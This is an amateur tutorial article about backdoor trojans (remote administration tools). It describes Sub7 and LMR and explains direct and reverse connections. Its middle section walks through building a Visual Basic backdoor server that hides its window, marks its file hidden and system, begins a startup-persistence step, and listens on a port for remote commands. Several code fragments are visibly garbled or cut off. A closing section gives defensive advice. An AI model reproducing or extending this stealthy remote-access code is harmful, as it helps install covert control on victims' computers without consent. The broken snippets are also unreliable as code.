About a backdoor
This article
will give you basic information about backdoor trojans
(often called RAT - Remote Administration Tool),how they work,how people make
them,
what are they used for and how to protect yourself from them.
I will provide you with Visual Basic code here that will show how to code
a backdoor.
1.
What backdoors basically are ?
Backdoors can be stand-alone executable files but can also be parts of worms
(MyDoom) or other programs.
The main purpose of a backdoor program is to provide a person remote access
to the computer/network where the backdoor program is running.
Usually,backdoors run without the users consent.
Network administrators often use backdoors (usually the commercial and "legal"
ones) to control their clients and supervise their actions in a business network.
In schools,backdoors are used by professors who want to prevent students from
messing with school computers.
But,backdoor
software is becoming more and more popular in these days among "script-kiddies"
and attackers that
want to steal confidental data (credit card info,etc.) and later sell the
stolen data.
"Script-kiddies" are usually young,12-13 year old children that
use programs made by someone else to mess with someone's computer,just for
fun.
A backdoor program can be written in a wide range of programming languages
(I will show you how to write a VB one here) simply,even if the programmer
who writes it isn't much experienced.
A program like this can provide almost full,or full control over the attacked
machine,allowing the user to exchange files,change system settings,kill processes,open/close
the CD-ROM,turn on/off monitor,run a proxy and much more you even wouldn't
think about.
Sub7 was a popular
backdoor-trojan written by Mobman.
It runs on Windows operating systems,and was presented on DefCon in 1999 by
it's author.
Today almost every anti-virus program or firewall can pick it up,but it was
used before years as a very popular remote-control program,usually by script-kiddies.
It has a way lot of functions,from playing tic-tac-toe with the attacked user,to
running an FTP server on the attacked machine and allowing the hacker to exchange
files with that computer.
Let-Me-Rule,or
shortly just LMR is also a popular RAT,which has similar functions to Sub-7.
It's author says that the program he wrote is for network administration and
not for illegal uses.
However,it was also used by many wannabe-hackers for the same purpose Sub-7
was used for.
2. How they work ?
Direct
connection:
Backdoors are usually based on a client-server network communication,where
the server is the attacked machine,
and the client is the attacker.It is a kind of standard.
This is called direct connection,when the client directly connects to the
server.
The server application is installed on the computer you want to control and
is hidden from the victim.
When the server application is runned,it will start listening for incoming
connections from the client.
Attackers use the client application is different from the server,as it has
a GUI (graphic user interface) that allows the attacker to connect to the
server remotely,by specifying the IP address of the server computer and the
port number (1-65535) on which the server application is listening.
If the connection is successfull,the client can now retreave information about
the server and send commands to it.
The server recognizes the commands,and executes a part of code for each commands.
For example,when you send a command "cdopen",the server will open
the CD-ROM door.
If the connection attempt failed,the server isn't running on the remote machine,or
a firewall/router is blocking the access to the port used by the server.
Reverse
connection:
This
kind of connection between the server and the client became popular when routers
became popular too.
The main advantage is that the server (or multiple servers) connect to a single
client,bypassing routers.
Secondly,the client can send a single command to multiple servers that are
connected (broadcasting).
Data exchange is same as in the direct communication.
3. A backdoor example in Visual Basic
If you already
know some basics of the Visual Basic (VB) programming language,it will be
useful now,because I'm going to show you how to write a simple backdoor,just
to let you see how stuff works in real.
You will need Microsoft's Visual Studio 6 to write and compile the code.
I will show how to code a simple server application,that will listen on port
1212 for incomming connection and execute pieces of code when a commands is
sent from the client.
I won't show you how to make a client application,you will need to figure
that out yourself (that's a bit challenge).
However,you can control the server using the Telnet client which comes with
Windows.
First open a
new project (Standard EXE).Click View > Toolbox in the file menu to make
the
toolbox visible if it's hidden.
Now,right-click on the toolbox on your left and select the first option,components.
A window will pop-up.In the first tab ("Components") find an option
called "Microsoft Winsock Control 6.0".
Check it and click OK.
You will see an icon that is like two small monitors in your toolbox.Drag
it on the form.
We've done
the preparation.Now we can begin coding our small backdoor.
First
lines - hiding the program and modifying registry
OK,now let's take a look on the code of the form.
Let's add some code to the Form_Load sub:
| Dim Startup If App.PrevInstance = True Then End Me.Hide |
The first line
The second line will make the application run only once,and end if another
instance of it is already running.
In the third line,the code will simply make the application window hide.That's
quite simple.
If you want to make your application file hidden and marked as a system file,write
a line like this:
SetAttr App.Path & "\" & App.EXEName & ".exe", vbHidden + vbSystem |
To make sure the server program will run each time Windows is started,let's type:
Set Startup =
CreateObject("WScript.Shell") |
Listen
for connections
The
following code will make the server's winsock control listen for incomming
connections:
| Private Function
Start() Winsock1.Close Winsock1.LocalPort = 1212 Winsock1.Listen End Function |
You should put
this code in a function,like shown about,so you can easily restart the listening
if the connection fails or if the client disconnects.
Instead of 1212,you can type any number you want,from 1 to 65535.
| Start |
Write this into the Form_Load sub,so the program will call the "Start" function you specifyied above and start listening when you run it.
Restarting
the connection
If
the connection brokes,make sure you can easily restart the server's listening.
Otherwise,you could connect only once per program run.
Make a timer called "tmrCheck" and set it to approximatelly 500
milliseconds.
| Private Sub tmrCheck_Timer() On Error Resume Next If Winsock1.State = 8 Then Start End If End Sub |
This timer will check every 500 milliseconds for the connection state,and if the connection is broken it will run the "Start" function again,so the server will start listening again.
Accepting
connection and sending first message
When
you attempt to connect to the server,it would be nice if the server would
let you do that.
This code will make the server accept incomming connections and send a welcome
message to the client when it is connected.
| Private Sub Winsock1_ConnectionRequest(ByVal
requestID As Long) On Error Resume Next If Winsock1.State <> sckClosed Winsock1.Close Winsock1.Accept requestID Winsock1.SendData "You are connected now." End Sub |
You can change
the message "You are connected now." to anything you want,and you
can add even more actions
to execute when someone tryies to connect to the server.
Receiving
commands and executing them
I
mentioned before that server programs receive commands from the client program,and
that way they decide what to do for each command and which part of the code
to execute.
Now I will show you how to do that.
You can add more commands and actions of course...
| Private Sub Winsock1_DataArrival(ByVal
bytesTotal As Long) Case "notepad" Case "close" Case "msg" End Select |
Put your commands
in different "cases" like shown in the code above.
It will be easy for you and for everyone else to view it and edit it.
In this example,when the server receives a text command "notepad"
you can send to it via Telnet,
it will launch Notepad.
When you send "close" to it,the server application will end.
And when you send "msg",a pop-up message will appear.
"Winsock1.GetData Rcv" will make sure everything that is received
will be handled as a string.
All in all,this
is a very simple RAT i showed you here.
You can make more winsock controls,to handle multiple connections,make a server
that connects to the server without needing to use the default Telnet client
for it,use better methods for hidding the server,reverse connection and an
endless number of other things.
4. Protection
Now when you
know how they work,it will be easier to protect yourself from backdoors.
Backdoors can penetrate your system on many ways,including e-mail,remote vulnerabilities,P2P
networks or they can be dropped by another malicious program.
It's good to have in mind that no computer security is unbreakable and that
everything can be disabled/bypassed.
However,you can take some steps to prevent remote attackers of accessing your
data and controlling your computer.
Firewall
Many
people don't have firewalls installed on their computers,which isn't very
suprising.
Why would they have one ? They don't know.It slows their computer down,always
has anoyinng questions and takes space on the hard disk.
Firewalls are VERY important.You should know that if you're already here.
In short,firewalls control all data that is sent/received through the network
you are connected to (Internet,LAN,WAN,etc.) and can easily prevent backdoor
attacks.
When a backdoor server application wants to listen,the firewall will prompt
you and ask you to give permission or deny.Of course,I suggest you to deny
anything unless you really trust the program.
Also,a firewall will prompt you if a backdoor client is trying to remotely
access your computer.
It is very useful to be informed about all data exchanged using your computer.
If you use Windows,than I suggest you to use ZoneAlarm firewall (there's a
free version) or Outpost firewall.
Anti-virus
Older
backdoor programs will be catched by most anti-virus programs.
However,if you are dealing with a quite new backdoor program,unknown to anti-virus
products,the possibilitty to catch it with an anti-virus program is low.
Maybe,if the anti-virus program you are using has advanced heuristic possibilities,will
catch the nasty backdoor.
So anti-virus products can't really help here...
How to
know ?
And
if you secured yourself by methods described above,you can be still unsure
about your protection.
If your network activity is high or higher than expected,but you're not doing
anything on the network than a backdoor server might be exchanging data with
it's server.
You can also check for open connections and ports by running "cmd"
and typing "netstat -a".
This will show you a list where you can see who is connected to your computer,on
which port and through which protocol.
Check your process list and startup list for strange names that are similar
to the names of registered parts of the operating system.
Than,check the process names using Google and see if the process belongs to
a backdoor program.
Use a port scanner to scan your own IP for open ports,so you can notice if
a program opened ports without your approval.
The article reached
it's end now.
I hope you enjoyed reading this article, and learnt some basics of backdoor
programs and understood how they work.
I tryied to keep the article as short as possible,
just to don't keep your attention and not get off the main idea of this article.
Used
sources:
en.wikipedia.org
www.google.com
www.governmentsecurity.org
Article by Feky